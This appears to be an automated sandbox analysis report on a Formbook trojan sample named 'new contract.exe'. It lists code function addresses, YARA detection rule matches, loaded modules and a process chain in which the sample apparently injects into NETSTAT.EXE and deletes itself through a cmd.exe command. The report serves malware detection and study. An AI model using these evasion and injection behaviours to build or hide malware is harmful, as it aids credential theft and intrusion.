Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031368B8 5_2_031368B8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0317E8F0 5_2_0317E8F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03170F30 5_2_03170F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031F2F30 5_2_031F2F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03192F28 5_2_03192F28
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031C4F40 5_2_031C4F40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031CEFA0 5_2_031CEFA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03142FC8 5_2_03142FC8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320EE26 5_2_0320EE26
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03150E59 5_2_03150E59
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03162E90 5_2_03162E90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320CE93 5_2_0320CE93
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320EEDB 5_2_0320EEDB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031ECD1F 5_2_031ECD1F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0315AD00 5_2_0315AD00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03168DBF 5_2_03168DBF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0314ADE0 5_2_0314ADE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03150C00 5_2_03150C00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031F0CB5 5_2_031F0CB5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03140CF2 5_2_03140CF2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320132D 5_2_0320132D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0313D34C 5_2_0313D34C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0319739A 5_2_0319739A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031552A0 5_2_031552A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0316B2C0 5_2_0316B2C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0316D2F0 5_2_0316D2F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031F12ED 5_2_031F12ED
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0321B16B 5_2_0321B16B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0313F172 5_2_0313F172
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0318516C 5_2_0318516C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0315B1B0 5_2_0315B1B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320F0E0 5_2_0320F0E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032070E9 5_2_032070E9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031FF0CC 5_2_031FF0CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031570C0 5_2_031570C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320F7B0 5_2_0320F7B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032016CC 5_2_032016CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03207571 5_2_03207571
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031ED5B0 5_2_031ED5B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320F43F 5_2_0320F43F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03141460 5_2_03141460
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320FB76 5_2_0320FB76
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0316FB80 5_2_0316FB80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0318DBF9 5_2_0318DBF9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031C5BF0 5_2_031C5BF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03207A46 5_2_03207A46
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320FA49 5_2_0320FA49
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031C3A6C 5_2_031C3A6C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031EDAAC 5_2_031EDAAC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03195AA0 5_2_03195AA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031F1AA3 5_2_031F1AA3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031FDAC6 5_2_031FDAC6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031E5910 5_2_031E5910
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03159950 5_2_03159950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0316B950 5_2_0316B950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031BD800 5_2_031BD800
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031538E0 5_2_031538E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320FF09 5_2_0320FF09
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03151F92 5_2_03151F92
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320FFB1 5_2_0320FFB1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03159EB0 5_2_03159EB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03207D73 5_2_03207D73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03153D40 5_2_03153D40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03201D5A 5_2_03201D5A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0316FDC0 5_2_0316FDC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031C9C32 5_2_031C9C32
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320FCF2 5_2_0320FCF2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052E1C7 5_2_0052E1C7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052E5A5 5_2_0052E5A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052D734 5_2_0052D734
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052E803 5_2_0052E803
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052DD0B 5_2_0052DD0B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00512D90 5_2_00512D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00512D88 5_2_00512D88
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00519E50 5_2_00519E50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00519E4D 5_2_00519E4D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00512FB0 5_2_00512FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DBA036 5_2_02DBA036
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DBB232 5_2_02DBB232
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB5B32 5_2_02DB5B32
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB5B30 5_2_02DB5B30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB1082 5_2_02DB1082
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB8912 5_2_02DB8912
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DBE5CD 5_2_02DBE5CD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB2D02 5_2_02DB2D02
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 03197E54 appears 99 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 031CF290 appears 103 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 031BEA12 appears 86 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 03185130 appears 58 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0313B970 appears 262 times
Source: C:\Users\user\Desktop\new contract.exe Code function: String function: 01677E54 appears 107 times
Source: C:\Users\user\Desktop\new contract.exe Code function: String function: 016AF290 appears 103 times
Source: C:\Users\user\Desktop\new contract.exe Code function: String function: 01665130 appears 58 times
Source: C:\Users\user\Desktop\new contract.exe Code function: String function: 0161B970 appears 262 times
Source: C:\Users\user\Desktop\new contract.exe Code function: String function: 0169EA12 appears 86 times
Source: new contract.exe, 00000000.00000002.1740008298.000000000126E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs new contract.exe
Source: new contract.exe, 00000000.00000002.1744485602.0000000008E80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs new contract.exe
Source: new contract.exe, 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs new contract.exe
Source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs new contract.exe
Source: new contract.exe, 00000002.00000002.1806931076.000000000171D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs new contract.exe
Source: new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs new contract.exe
Source: new contract.exe Binary or memory string: OriginalFilenameQTW.exe6 vs new contract.exe
Source: new contract.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.4142928612.000000000E4FB000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: new contract.exe PID: 7424, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: new contract.exe PID: 7648, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 7732, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: new contract.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fgEBeMUyhH7sZUUckO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: _0020.SetAccessControl
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: _0020.AddAccessRule
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: _0020.SetAccessControl
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: _0020.AddAccessRule
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: _0020.SetAccessControl
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: _0020.AddAccessRule
Source: 0.2.new contract.exe.419def0.2.raw.unpack, fgEBeMUyhH7sZUUckO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fgEBeMUyhH7sZUUckO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/1@11/1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00681CFC GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle, 5_2_00681CFC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00681C89 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle, 5_2_00681C89
Source: C:\Users\user\Desktop\new contract.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\new contract.exe.log
Source: C:\Users\user\Desktop\new contract.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: new contract.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\new contract.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: new contract.exe ReversingLabs: Detection: 50%
Source: unknown Process created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe"
Source: C:\Users\user\Desktop\new contract.exe Process created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new contract.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\new contract.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\new contract.exe Section loaded: iconcodecservice.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: snmpapi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: wininet.dll
Source: C:\Users\user\Desktop\new contract.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\new contract.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: new contract.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: new contract.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: netstat.pdbGCTL source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp, new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: netstat.pdb source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp, new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: new contract.exe, 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1808242227.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1806702400.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: new contract.exe, new contract.exe, 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000003.1808242227.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1806702400.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs .Net Code: U3QVC8bZLu System.Reflection.Assembly.Load(byte[])
